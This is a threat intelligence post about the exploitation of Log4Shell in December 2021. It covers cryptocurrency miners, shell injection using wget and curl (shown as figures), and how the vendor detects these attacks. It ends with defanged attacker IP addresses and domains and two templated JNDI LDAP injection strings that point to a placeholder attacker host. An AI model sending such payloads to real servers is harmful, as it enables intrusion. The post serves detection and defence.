Free Trial
Schedule Demo
Adam has over 12 years of collective intelligence experience – with 8 years in Cyber Threat Intelligence (CTI) distributed across various disciplines which include: incident response, malware analysis,... Read More
Comments
Latest Threat Activity and Fidelis Response
Key Developments | 17 December 2021
Multiple high-fidelity sources continue to report that cyber threat actors of various skill and motivation are leveraging this vulnerability to either deliver their primary payload (e.g., cryptocurrency mining malware) or establish initial access into the victim environment (e.g., Cobalt Strike), which will almost certainly lead to more intrusion chains of various sophistication. While we have yet to directly observe Cobalt Strike use, Fidelis Threat Research Team (TRT) has observed an exorbitant amount of Linux/Unix command shell injection in the week since the disclosure of the Log4shell vulnerability.
Cryptocurrency Miners
Figure 1. Log4shell exploitation attempts from actors most likely deploying crypocurrency miners – source: Fidelis Telemetry
Figure 2. Log4shell exploitation attempts from actors most likely deploying crypocurrency miners – image credit: BleepingComputer
Command Shell Injection
Figure 3. Command shell injections following Log4shell, using WGET – source: Fidelis Telemetry
Figure 4. Command shell injections following Log4Shell, using CURL – source: Fidelis Telemetry
Fidelis Response
Fidelis TRT continues to ehance our detection logic primarily through direct collection and analysis of live attack telemetry data and broader observations through industry partnerships and vetted open-source intelligence.
Figure 5. Fidelis dynamic detection alert firing on WAF evasion (HTTP User-Agent) for Log4Jshell – source: Fidelis Telemetry
Indicators
IPv4 and Port(s)
45.137.21[.]9:1389
135.148.143[.]217:1389
159.89.4[.]39:80
62.210.130[.]250:80
FQDN and Subdomain(s)
psc4fuel[.]com
*dga*.y.psc4fuel[.]com
956f6f95428e42c7af00.y.psc4fuel[.]com
d8083d89178e4d87b414.y.psc4fuel[.]com
8def43d42c0e4b3d9857.y.psc4fuel[.]com
9acd97959c2e4ca596b0.y.psc4fuel[.]com
Network Relevant Strings
${jndi:ldap://badguyFQDN[OR]IPv4/*malicious_content*}
${jndi:ldap://badguyFQDN[OR]IPv4/Basic//*maliciousbase64_content*}